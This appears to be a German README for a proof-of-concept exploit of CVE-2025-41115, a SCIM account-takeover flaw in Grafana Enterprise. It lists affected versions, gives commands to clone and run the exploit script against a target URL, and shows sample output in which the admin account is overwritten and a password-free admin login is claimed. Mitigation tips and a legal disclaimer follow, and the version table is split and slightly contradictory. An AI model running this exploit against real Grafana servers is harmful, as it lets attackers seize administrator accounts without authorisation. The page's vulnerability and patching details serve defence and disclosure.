
CVE-2025-41115

Kritische SCIM-Privilegienerweiterungs-Sicherheitslücke in Grafana Enterprise
CVE-2025-41115 ist eine kritische (CVSS 10.0) Sicherheitslücke in Grafana Enterprise, die dessen SCIM-Benutzerbereitstellungsfunktion betrifft.
Wenn SCIM-Bereitstellung aktiviert ist und user_sync_enabled = true, kann ein bösartiger SCIM-Client eine numerische externalId senden, die Grafana fälschlicherweise einer internen Benutzer-ID zuordnet – was einem Angreifer ermöglicht, bestehende Konten, einschließlich Administratoren, zu imitieren oder zu überschreiben.
⚠️ Grafana OSS ist NICHT betroffen.
Voraussetzungen für die Ausnutzung:
enableSCIM = true[auth.scim] user_sync_enabled = true| Version | Status |
|---|---|
| 12.0.0 → 12.2.1 | ❌ Angreifbar |
| 12.3.0 | ✅ Behoben |
| 12.2.1 (patched build) | ✅ Behoben |
| 12.1.3 | ✅ Behoben |
💡 Managed Grafana-Dienste (AWS/Azure/Grafana Cloud) wurden von den Anbietern gepatcht.
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
oder kopieren Sie das Skript oben einfach in eine Datei
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
Wenn der Exploit tatsächlich funktioniert (d.h. das Ziel ist angreifbar und das Token ist gültig), sehen Sie eine Ausgabe genau wie diese: text
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
Aktualisieren Sie auf 12.3.0 oder einen der gepatchten Wartungsversionen.
Wenn Sie keine SCIM-Bereitstellung verwenden, stellen Sie sicher, dass Sie Folgendes haben:
enableSCIM = false
oder
[auth.scim]
user_sync_enabled = false
Suchen Sie nach:
externalIdStellen Sie sicher, dass nur vertrauenswürdige Identitätsanbieter mit Ihrem SCIM-Endpunkt kommunizieren dürfen.
Achten Sie auf verdächtige Anmeldungen, Benutzererstellungsereignisse oder Administratorübernahmen.
Dieser PoC dient ausschließlich zu autorisierten Sicherheitstests und Bildungszwecken in Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Die unbefugte Nutzung ist illegal und kann zu strafrechtlicher Verfolgung führen. Der Autor und der Verteiler übernehmen keine Haftung für Missbrauch. Patchen Sie sofort (≥12.0.6 / 12.3.0+).
| 12.0.6 | ✅ Behoben |